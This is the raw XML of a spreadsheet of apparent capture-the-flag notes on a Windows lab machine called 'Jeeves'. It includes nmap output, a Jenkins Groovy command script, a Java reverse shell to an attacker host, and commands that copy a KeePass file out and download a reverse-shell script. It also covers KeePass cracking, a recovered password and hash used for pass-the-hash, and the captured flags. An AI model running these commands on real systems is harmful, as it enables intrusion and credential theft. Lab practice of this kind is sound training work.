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78F27E11-49D8-4126-89E6-CF018127011B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-135" yWindow="-16335" windowWidth="29070" windowHeight="15750" activeTab="5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  <sheet name="Reverse Engineering" sheetId="6" r:id="rId6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5" i="1" l="1"/>
  <c r="E5" i="1"/>
  <c r="E3" i="1"/>
  <c r="E4" i="1"/>
  <c r="E2" i="1"/>
  <c r="F3" i="1"/>
  <c r="F4" i="1"/>
  <c r="F2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="93" uniqueCount="71">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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80/tcp</t>
  </si>
  <si>
    <t>Task</t>
  </si>
  <si>
    <t>App</t>
  </si>
  <si>
    <t>Sub task</t>
  </si>
  <si>
    <t>445/tcp</t>
  </si>
  <si>
    <t>50000/tcp</t>
  </si>
  <si>
    <t>135/tcp</t>
  </si>
  <si>
    <t>80/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                                                                                       
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                                                                    
|_http-title: Ask Jeeves                                                                                                                                                                                                                    
| http-methods:                                                                                                                                                                                                                             
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                                                                                                                                                                          
|_  Potentially risky methods: TRACE</t>
  </si>
  <si>
    <t>135/tcp   open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)</t>
  </si>
  <si>
    <t>445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 4h59m43s, deviation: 0s, median: 4h59m42s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2026-07-04T21:30:24
|_  start_date: 2026-07-04T21:20:14</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>https://stackoverflow.com/questions/144283/what-is-the-difference-between-varchar-and-nvarchar</t>
  </si>
  <si>
    <t xml:space="preserve">/error.html?
</t>
  </si>
  <si>
    <t>Exception is getting thrown and I guess stack trace.
SQL database. Ohh it's trying to convert that string to int.
.cs files are C# programs.</t>
  </si>
  <si>
    <t>I think there might be and RCE for this.</t>
  </si>
  <si>
    <t>python3 -c "import urllib.parse; print(urllib.parse.quote('../../../../../../webroot/Sock_Puppets/App_Code/Generic DataAccess.cs', safe=''))"</t>
  </si>
  <si>
    <t>c:\webroot\Sock_Puppets\App_Code\Generic DataAccess.cs
Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
jeeves.PNG</t>
  </si>
  <si>
    <t>/askjeeves/</t>
  </si>
  <si>
    <t>def cmd = "whoami"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout"
println "err&gt; $serr"</t>
  </si>
  <si>
    <t>https://hackviser.com/tactics/pentesting/services/jenkins</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Jenkins ver. 2.87
user.txt
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>e3232272596fb47950d59c4cf1e7066a</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Had to directory search with the correct wordlist.
Nice you can run scripts from the console.
Nice I'm on the console from the shell.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>User is kohsuke</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>impacket-smbserver share ./ -smb2support</t>
  </si>
  <si>
    <t xml:space="preserve">keepass2john CEH.kdbx </t>
  </si>
  <si>
    <t>jeeves\kohsuke</t>
  </si>
  <si>
    <t>john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</t>
  </si>
  <si>
    <t>https://infosecwriteups.com/brute-forcing-keepass-database-passwords-cbe2433b7beb</t>
  </si>
  <si>
    <t>powershell -ep bypass -f .\RunAsRevShell.ps1</t>
  </si>
  <si>
    <t>powershell -c "Get-ChildItem -Path C:\ -Filter root.txt -Recurse -ErrorAction SilentlyContinue"</t>
  </si>
  <si>
    <t>dir *.txt /s /b</t>
  </si>
  <si>
    <t>powershell -c "Get-ChildItem C:\ -Recurse -Force -ErrorAction SilentlyContinue -File | Select-String -Pattern '^[a-f0-9]{32}$'"</t>
  </si>
  <si>
    <t>powershell -c "Get-ChildItem C:\ -Filter *.txt -Recurse -Force -ErrorAction SilentlyContinue"</t>
  </si>
  <si>
    <t>powershell -c "Get-ChildItem C:\ -Directory -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'backup|bak|old|archive' }"</t>
  </si>
  <si>
    <t>Has KeePass database. Going to try and crack it.
Password is moonshine1.
Looks like there's a local port on the machine. 8180.
Tried SMB on the creds. No luck.
It was the backup hash in the database.
Alternative stream
more &lt; hm.txt:root.txt</t>
  </si>
  <si>
    <t>more &lt; hm.txt:root.txt</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CEH.kdbx
moonshine1
http://localhost:8080
http://localhost:8180/secret.jsp
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 
hm.txt:root.txt:$DATA
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>root.txt
afbc5bd4b615a60648cec41c6ac92530</t>
    </r>
  </si>
  <si>
    <t>// Windows reverse shell
String host="[attack IP]";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()&gt;0)so.write(pi.read());
  while(pe.available()&gt;0)so.write(pe.read());
  while(si.available()&gt;0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();</t>
  </si>
  <si>
    <t>copy C:\Users\kohsuke\Documents\CEH.kdbx \\[attack IP]\share\CEH.kdbx</t>
  </si>
  <si>
    <t>powershell -c "Invoke-WebRequest -Uri http://[attack IP]:8080/RunAsRevShell.ps1 -OutFile C:\Users\kohsuke\Desktop\RunAsRevShell.ps1"</t>
  </si>
  <si>
    <t>[victim IP]</t>
  </si>
  <si>
    <t>http://[victim IP]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</si>
  <si>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</si>
  <si>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</si>
  <si>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python3 dirsearch.py -u http://[victim IP]:50000/</t>
  </si>
  <si>
    <t xml:space="preserve">python3 dirsearch.py -u http://[victim IP]:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </t>
  </si>
  <si>
    <t>nxc smb [victim IP] -u $(cut -d ':' -f 1 creds.txt) -p $(cut -d ':' -f 2 creds.txt)</t>
  </si>
  <si>
    <t>psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@[victim 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</si>
</sst>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hackviser.com/tactics/pentesting/services/jenkins" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/144283/what-is-the-difference-between-varchar-and-nvarcha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nfosecwriteups.com/brute-forcing-keepass-database-passwords-cbe2433b7be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5"/>
  <sheetViews>
    <sheetView zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="D14" sqref="D14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="6" width="15.77734375" style="2"/>
    <col min="7" max="7" width="23.5546875" style="2" customWidth="1"/>
    <col min="8" max="8" width="35.44140625" style="2" customWidth="1"/>
    <col min="9" max="9" width="23.44140625" style="2" customWidth="1"/>
    <col min="10" max="10" width="36.6640625" style="2" customWidth="1"/>
    <col min="11" max="11" width="34.5546875" style="2" customWidth="1"/>
    <col min="12" max="16384" width="15.777343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63</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>34</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>27</v>
      </c>
      <c r="E2" s="7" t="str">
        <f>LEFT($D2,FIND("/",$D2)-1)</f>
        <v>445</v>
      </c>
      <c r="F2" s="6" t="str">
        <f>MID($D2,FIND("/",$D2)+1,LEN($D2))</f>
        <v>tcp</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>33</v>
      </c>
      <c r="H2" s="4"/>
      <c r="J2" s="5"/>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>34</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>28</v>
      </c>
      <c r="E3" s="7" t="str">
        <f t="shared" ref="E3:E5" si="0">LEFT($D3,FIND("/",$D3)-1)</f>
        <v>50000</v>
      </c>
      <c r="F3" s="6" t="str">
        <f t="shared" ref="F3:F5" si="1">MID($D3,FIND("/",$D3)+1,LEN($D3))</f>
        <v>tcp</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>32</v>
      </c>
      <c r="H3" s="2" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>34</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E4" s="7" t="str">
        <f t="shared" si="0"/>
        <v>80</v>
      </c>
      <c r="F4" s="6" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>30</v>
      </c>
      <c r="J4" s="5"/>
    </row>
    <row r="5" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>34</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>29</v>
      </c>
      <c r="E5" s="7" t="str">
        <f t="shared" si="0"/>
        <v>135</v>
      </c>
      <c r="F5" s="6" t="str">
        <f t="shared" si="1"/>
        <v>tcp</v>
      </c>
      <c r="G5" s="2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="6" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E6" s="7"/>
      <c r="F6" s="6"/>
      <c r="J6" s="5"/>
    </row>
    <row r="7" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E7" s="7"/>
      <c r="F7" s="6"/>
    </row>
    <row r="8" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E8" s="7"/>
      <c r="F8" s="6"/>
      <c r="H8" s="4"/>
      <c r="I8" s="4"/>
      <c r="J8" s="5"/>
    </row>
    <row r="9" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E9" s="8"/>
      <c r="F9" s="6"/>
      <c r="I9" s="4"/>
      <c r="J9" s="5"/>
    </row>
    <row r="10" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E10" s="8"/>
      <c r="F10" s="6"/>
      <c r="I10" s="4"/>
      <c r="J10" s="5"/>
    </row>
    <row r="11" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E11" s="8"/>
      <c r="F11" s="6"/>
      <c r="H11" s="4"/>
    </row>
    <row r="12" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E12" s="7"/>
      <c r="F12" s="6"/>
      <c r="J12" s="5"/>
    </row>
    <row r="13" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E13" s="7"/>
      <c r="F13" s="6"/>
    </row>
    <row r="14" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E14" s="7"/>
      <c r="F14" s="6"/>
    </row>
    <row r="15" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E15" s="7"/>
      <c r="F15" s="6"/>
    </row>
    <row r="16" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E16" s="7"/>
      <c r="F16" s="6"/>
    </row>
    <row r="17" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E17" s="7"/>
      <c r="F17" s="6"/>
    </row>
    <row r="18" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E18" s="7"/>
      <c r="F18" s="6"/>
    </row>
    <row r="19" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E19" s="7"/>
      <c r="F19" s="6"/>
    </row>
    <row r="20" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E20" s="7"/>
      <c r="F20" s="6"/>
      <c r="I20" s="4"/>
      <c r="J20" s="5"/>
    </row>
    <row r="21" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E21" s="7"/>
      <c r="F21" s="6"/>
    </row>
    <row r="22" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E22" s="7"/>
      <c r="F22" s="6"/>
    </row>
    <row r="23" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E23" s="7"/>
      <c r="F23" s="6"/>
      <c r="I23" s="4"/>
      <c r="J23" s="5"/>
    </row>
    <row r="24" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E24" s="7"/>
      <c r="F24" s="6"/>
    </row>
    <row r="25" spans="5:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E25" s="7"/>
      <c r="F25" s="6"/>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K27">
    <sortCondition ref="F2:F27"/>
    <sortCondition ref="E2:E27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I22"/>
  <sheetViews>
    <sheetView zoomScale="78" zoomScaleNormal="78" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="E20" sqref="E20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="38.44140625" style="2" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="13.109375" style="2" customWidth="1"/>
    <col min="3" max="4" width="15.77734375" style="2"/>
    <col min="5" max="5" width="39.5546875" style="2" customWidth="1"/>
    <col min="6" max="6" width="41.77734375" style="2" customWidth="1"/>
    <col min="7" max="7" width="30.5546875" style="2" customWidth="1"/>
    <col min="8" max="8" width="15.77734375" style="2"/>
    <col min="9" max="9" width="45.5546875" style="2" customWidth="1"/>
    <col min="10" max="16384" width="15.77734375" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" s="4" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>17</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>21</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>10</v>
      </c>
      <c r="I1" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>64</v>
      </c>
      <c r="B2" s="1">
        <v>80</v>
      </c>
      <c r="D2" s="2">
        <v>200</v>
      </c>
    </row>
    <row r="3" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1" t="s">
        <v>64</v>
      </c>
      <c r="B3" s="1">
        <v>80</v>
      </c>
      <c r="D3" s="2">
        <v>200</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>36</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>37</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>40</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="4" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>64</v>
      </c>
      <c r="B4" s="2">
        <v>50000</v>
      </c>
      <c r="D4" s="2">
        <v>200</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>41</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>45</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>44</v>
      </c>
      <c r="H4" s="5" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="5" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1"/>
    </row>
    <row r="6" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="1"/>
    </row>
    <row r="7" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="1"/>
    </row>
    <row r="8" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="1"/>
      <c r="B8" s="1"/>
      <c r="G8" s="5"/>
    </row>
    <row r="9" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E9" s="4"/>
    </row>
    <row r="10" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E10" s="4"/>
    </row>
    <row r="11" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E11" s="4"/>
    </row>
    <row r="12" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E12" s="4"/>
    </row>
    <row r="13" spans="1:9" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E13" s="4"/>
    </row>
    <row r="22" spans="8:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="H22" s="5"/>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="H3" r:id="rId1" xr:uid="{7AAD1BD1-3052-4D56-817D-E69BB069E557}"/>
    <hyperlink ref="H4" r:id="rId2" xr:uid="{740FE840-8A7F-413C-B22D-7E6288EDF578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75" zoomScaleNormal="75" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" sqref="A1:XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="4" width="15.77734375" style="2"/>
    <col min="5" max="5" width="30.109375" style="2" customWidth="1"/>
    <col min="6" max="7" width="15.77734375" style="2"/>
    <col min="8" max="8" width="47.88671875" style="2" customWidth="1"/>
    <col min="9" max="9" width="18.44140625" style="2" customWidth="1"/>
    <col min="10" max="10" width="55.88671875" style="2" customWidth="1"/>
    <col min="11" max="11" width="31.77734375" style="2" customWidth="1"/>
    <col min="12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63</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>48</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>57</v>
      </c>
      <c r="I2" s="5" t="s">
        <v>50</v>
      </c>
      <c r="J2" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1"/>
      <c r="E3" s="1"/>
      <c r="G3" s="4"/>
      <c r="I3" s="5"/>
      <c r="J3" s="4"/>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="1"/>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="I2" r:id="rId1" xr:uid="{96023714-D492-4540-81E5-9619427FAA7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25"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <selection activeCell="A29" sqref="A29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="175" style="6" bestFit="1" customWidth="1"/>
    <col min="2" max="16384" width="8.88671875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="9" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="3" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="9" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="4" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="6" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="5" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="6" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="7" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="6" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="8" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="6" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="9" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="6" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="10" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="6" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="11" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="6" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="12" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="6" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="13" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="6" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="14" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="6" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="15" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" s="6" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="16" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" s="6" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="17" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="6" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="18" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" s="6" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="19" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="6" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="20" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="6" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="21" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="6" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="22" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A22" s="6" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="23" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="6" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="24" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A24" s="6" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="25" spans="1:1" s="9" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25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workbookViewId="0">
      <selection activeCell="A20" sqref="A20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  <row r="2" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2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D08-FB8B-4BAB-A462-7059BEE8513F}">
  <dimension ref="A1:D3"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="F19" sqref="F19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="12.109375" style="1" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="13.5546875" style="1" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="8.33203125" style="1" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="29.6640625" style="1" bestFit="1" customWidth="1"/>
    <col min="5" max="16384" width="8.88671875" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="3" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:4" x14ac:dyDescent="0.3">
      <c r="D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Web App</vt:lpstr>
      <vt:lpstr>On host</vt:lpstr>
      <vt:lpstr>Commands</vt:lpstr>
      <vt:lpstr>Misc</vt:lpstr>
      <vt:lpstr>Reverse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2026-07-04T22:03:57Z</dcterms:modified>
</cp:coreProperties>
</file>